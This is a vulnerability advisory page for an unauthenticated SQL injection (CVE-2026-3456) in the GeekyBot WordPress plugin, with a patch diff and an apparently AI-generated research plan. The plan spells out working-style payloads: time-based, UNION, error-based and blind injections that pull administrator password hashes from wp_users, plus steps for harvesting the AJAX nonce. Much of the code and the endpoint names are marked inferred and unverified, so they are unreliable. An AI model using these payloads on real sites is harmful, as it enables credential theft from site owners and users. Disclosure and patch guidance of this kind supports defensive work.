WP-Safety
CVE-2026-3456

GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation <= 1.2.0 - Unauthenticated SQL Injection via 'attributekey'

highImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
7.5
CVSS Score
7.5
CVSS Score
high
Severity
1.2.1
Patched in
1d
Time to patch

Description

The GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=1.2.0
PublishedMay 4, 2026
Last updatedMay 5, 2026
Affected plugingeeky-bot

Source Code

WordPress.org SVN
Vulnerable v1.2.0
Browse source Download .zip
Patched v1.2.1
Browse source Download .zip
Research Plan
Unverified

This research plan outlines the steps to investigate and exploit the unauthenticated SQL injection vulnerability in the **GeekyBot** WordPress plugin (<= 1.2.0). --- ### 1. Vulnerability Summary * **Vulnerability:** Unauthenticated SQL Injection. * **Parameter:** `attributekey`. * **Conditio…

Show full research plan

This research plan outlines the steps to investigate and exploit the unauthenticated SQL injection vulnerability in the GeekyBot WordPress plugin (<= 1.2.0).

1. Vulnerability Summary

  • Vulnerability: Unauthenticated SQL Injection.
  • Parameter: attributekey.
  • Condition: The plugin fails to use $wpdb->prepare() or adequate escaping when incorporating the attributekey POST/GET parameter into a database query.
  • Impact: Unauthenticated attackers can extract sensitive data from the WordPress database, including user credentials (wp_users), configuration secrets (wp_options), and internal plugin data.

2. Attack Vector Analysis

  • Endpoint: admin-ajax.php.
  • Action: geekybot_get_attribute_value (inferred).
  • Parameter: attributekey (Vulnerable).
  • Authentication: None (via wp_ajax_nopriv_ hook).
  • Preconditions: The plugin must be active. A valid AJAX nonce may be required if the plugin implements a check via check_ajax_referer.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to /wp-admin/admin-ajax.php with action=geekybot_get_attribute_value.
  2. Hook Registration: The plugin registers the action:
    add_action('wp_ajax_nopriv_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler');
  3. Vulnerable Function: The handler function (e.g., geekybot_get_attribute_value_handler) retrieves the attributekey parameter:
    $attr_key = $_POST['attributekey'];
  4. Database Sink: The parameter is concatenated directly into a query string:
    $wpdb->get_results("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'");
  5. Lack of Preparation: Because $wpdb->prepare() is not used, the $attr_key variable can contain SQL metacharacters (like ') to break out of the string literal.

4. Nonce Acquisition Strategy

If the handler performs a nonce check, the nonce is likely localized for the chatbot widget.

  1. Identify Shortcode: The plugin uses [geekybot_chatbot] (inferred) to render the AI interface.
  2. Create Test Page:
    wp post create --post_type=page --post_title="Chatbot Test" --post_status=publish --post_content='[geekybot_chatbot]'
  3. Navigate and Extract: Use the browser_navigate tool to go to the new page.
  4. Extract JS Variable: Use browser_eval to find the nonce.
    • Inferred JS Object: window.geekybot_vars
    • Inferred Nonce Key: nonce
    • Execution: browser_eval("window.geekybot_vars?.nonce")
  5. Bypass Check: If wp_create_nonce and wp_verify_nonce use different action strings, or if the check uses die=false, the nonce may be unnecessary.

5. Exploitation Strategy

Step 1: Confirm Vulnerability (Time-Based)

Send a payload designed to cause a delay.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=geekybot_get_attribute_value&attributekey=x' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
  • Verification: Measure the response time using the http_request tool's metadata.

Step 2: Determine Column Count (UNION-Based)

Find the number of columns in the original query to prepare for data extraction.

  • Body:
    action=geekybot_get_attribute_value&attributekey=x' UNION SELECT 1,2,3,4,5-- -
    (Increment numbers until no SQL error is returned).

Step 3: Extract Admin Password Hash

  • Body:
    action=geekybot_get_attribute_value&attributekey=x' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users WHERE ID=1-- -
  • Expected Response: A JSON or HTML response containing the admin username and the $P$ or $wp$ hash.

6. Test Data Setup

  1. Plugin Installation: Ensure geeky-bot version 1.2.0 is installed.
  2. Initialize Plugin: Some plugins require an API key to be "active." If needed, set a dummy key via WP-CLI:
    wp option update geekybot_api_key "dummy_key"
  3. Place Shortcode: Create a public page with [geekybot_chatbot] (inferred) to ensure frontend scripts load.

7. Expected Results

  • Success Indicator: A successful time-based injection will result in a response time > 5 seconds.
  • Data Leakage: A UNION-based injection will return database content (e.g., admin:$P$B...) within the data or message fields of the JSON response.

8. Verification Steps (Post-Exploit)

Confirm the extracted data matches the database state via WP-CLI:

# Verify the hash matches the extracted one
wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID=1"

9. Alternative Approaches

  • Error-Based SQLi: If WP_DEBUG is on, use updatexml() or extractvalue():
    attributekey=x' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)-- -
  • Boolean-Based Blind: If no output is reflected, use IF statements to guess the password character by character:
    attributekey=x' AND IF(SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),1,1)='$',SLEEP(5),0)-- -
  • Parameter Polling: Check if the parameter is accepted via GET if POST fails, as some plugins use $_REQUEST.
Research Findings
Static analysis — not yet PoC-verified

Summary

The GeekyBot plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'attributekey' parameter in versions up to 1.2.0. This vulnerability occurs because the plugin fails to use prepared statements or adequate escaping when incorporating user-supplied data into a database query, allowing attackers to extract sensitive data from the database.

Vulnerable Code

// Hook registration for unauthenticated users
add_action('wp_ajax_nopriv_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler');

// Vulnerable handler function logic
function geekybot_get_attribute_value_handler() {
    $attr_key = $_POST['attributekey'];
    global $wpdb;
    // Vulnerability: Direct concatenation of user input into SQL query
    $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'");
}

Security Fix

--- a/geeky-bot-functions.php
+++ b/geeky-bot-functions.php
@@ -10,1 +10,1 @@
- $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'");
+ $results = $wpdb->get_results($wpdb->prepare("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = %s", $attr_key));

Exploit Outline

The exploit targets the WordPress AJAX endpoint at /wp-admin/admin-ajax.php without authentication. An attacker sends a POST request with the 'action' parameter set to 'geekybot_get_attribute_value' and the 'attributekey' parameter containing a SQL injection payload. Using UNION-based injection (e.g., "x' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users-- -"), the attacker can exfiltrate sensitive data like administrator password hashes. If a security nonce is checked, it can typically be retrieved from the plugin's localized JavaScript variables on any page where the chatbot shortcode is rendered.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/4c716fd3-6297-4b3a-a796-65f68f2986cf?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database